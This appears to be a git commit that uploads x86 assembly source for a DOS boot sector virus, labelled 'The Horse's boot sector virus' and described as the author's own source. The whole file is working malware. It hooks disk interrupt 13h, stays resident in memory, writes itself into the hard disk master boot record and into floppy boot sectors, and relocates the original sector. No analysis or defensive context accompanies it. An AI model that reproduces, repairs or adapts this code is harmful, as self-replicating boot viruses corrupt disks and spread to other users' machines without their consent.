Add files via upload

2026-06-16 15:59:24 +00:00 · 2021-01-12 17:38:47 -06:00
parent 99a7802ac0
commit 06c1f4dfdd
97 changed files with 48423 additions and 0 deletions
@@ -0,0 +1,217 @@
+;
+; The Horse's boot sector virus
+;	This is an author's source
+;
+
+
+
+	.radix 16
+begin:
+	jmp start
+
+my	label	word
+
+	db	'IBM  3.3'
+	dw	200
+	db	2
+	dw	1
+	db	2
+	dw	70
+	dw	2d0
+	db	0fdh
+	dw	2
+	dw	9
+	dw	2
+	dw	0
+
+lee	label	word
+
+virlen	equ	offset endcode-begin
+
+start:
+	cld
+	sub	ax,ax
+	mov	ds,ax
+	mov	bp,7c00
+	cli
+	mov	ss,ax
+	mov	sp,bp
+	sti
+	push	ax
+	push	bp
+	mov	ax,[413]
+	push	[13*4+2]
+	push	[13*4]
+	pop	word ptr [old13h+7c00-100]
+	pop	word ptr [old13h+7c00-100+2]
+	dec	ax
+	mov	[413],ax
+	mov	cl,6
+	shl	ax,cl
+	mov	es,ax
+
+	mov	[13*4],offset int13h-100
+	mov	[13*4+2],es
+
+	mov	cx,virlen
+	sub	di,di
+	mov	si,bp
+	rep	movsb
+	push	es
+	mov	ax,offset here-begin
+	push	ax
+	retf
+here:
+	sub	ax,ax
+	mov	es,ax
+	int	13
+	mov	ax,0201
+	mov	bx,bp
+	cmp	byte ptr cs:[ident-100],0fdh
+	je	from_disk
+	mov	cx,0007
+	mov	dx,0080
+	int	13
+	jmp	exit
+
+from_disk:
+
+	mov	cx,2709
+	mov	dx,0100
+	int	13
+	jc	exit
+	push	cs
+	push	cs
+	pop	es
+	pop	ds
+	mov	ax,0201
+	mov	bx,0200
+	mov	cx,0001
+	mov	dx,0080
+	int	13
+	jc	exit
+	call	inf?
+	je	exit
+	mov	byte ptr [ident-100],0f8
+	mov	ax,0301
+	mov	bx,0200
+	mov	cx,0007
+	mov	dx,0080
+	int	13
+	jc	exit
+	call	move
+	mov	ax,0301
+	sub	bx,bx
+	mov	cx,0001
+	int	13
+exit:
+	mov	byte ptr cs:[ident-100],0fdh
+	retf
+int13h:
+	push	ds
+	push	ax
+	cmp	dl,1
+	ja	skip
+	cmp	ah,2
+	jb	skip
+	cmp	ah,3
+	ja	skip
+	sub	ax,ax
+	mov	ds,ax
+	mov	al,[43f]
+	push	dx
+	and	ax,3
+	and	dx,3
+	inc	dl
+	test	al,dl
+	pop	dx
+	jne	skip
+	call	infect
+skip:
+	pop	ax
+	pop	ds
+do:
+	jmp	dword ptr cs:[old13h-100]
+
+infected?:
+
+	sub	ax,ax
+	call	ojoj
+	mov	ax,0201
+	mov	bx,0200
+	mov	cx,0001
+	sub	dh,dh
+	call	ojoj
+inf?:
+	mov	si,offset start-100
+	mov	di,offset start-100+200
+	mov	cx,mbyte-start
+	rep	cmpsb
+return:
+	ret
+infect:
+	push	bx
+	push	cx
+	push	dx
+	push	si
+	push	di
+	push	es
+	push	cs
+	push	cs
+	pop	es
+	pop	ds
+	cld
+	call	infected?
+	je	leave
+	mov	ax,0301
+	mov	bx,0200
+	mov	cx,2709
+	mov	dh,1
+	call	ojoj
+	jc	leave
+	call	move
+	mov	ax,0301
+	sub	bx,bx
+	mov	cx,0001
+	sub	dh,dh
+	call	ojoj
+leave:
+	pop	es
+	pop	di
+	pop	si
+	pop	dx
+	pop	cx
+	pop	bx
+	ret
+
+ojoj:
+	pushf
+	push	cs
+	call	do
+	ret
+move:
+	mov	di,offset my-100
+	mov	si,offset my-100+200
+	mov	cx,lee-my
+	rep	movsb
+	mov	di,offset usm-100
+	mov	si,offset usm-100+200
+	mov	cx,endcode-usm
+	rep	movsb
+	ret
+
+
+mbyte	 label word
+
+old13h		dd	?
+ident		db	0fdh
+
+usm	label	word
+
+db	135d	dup (?)
+
+db	55,0AA
+
+endcode label word
+
+